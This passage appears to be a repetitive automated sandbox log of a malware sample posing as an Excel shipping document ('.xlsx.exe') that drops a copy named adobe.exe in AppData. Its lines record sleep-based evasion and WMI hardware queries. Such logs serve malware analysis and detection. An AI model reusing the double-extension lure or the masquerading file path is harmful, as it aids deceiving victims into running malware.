                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 2736Thread sleep count: 2376 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 2736Thread sleep count: 7457 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598857s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -598078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep time: -594203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep count: 40 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7116Thread sleep count: 3382 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599881s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599763s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599652s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7116Thread sleep count: 6467 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598561s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596560s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596123s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -596015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595577s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595468s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595260s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -595047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -594937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -594828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -594718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2212Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5024Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1612Thread sleep count: 1692 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1612Thread sleep count: 8151 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598516s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -598063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597266s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -597047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -594922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -594812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -594703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -594594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 4484Thread sleep time: -594484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599563Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598857Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597844Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595110Jump to behavior
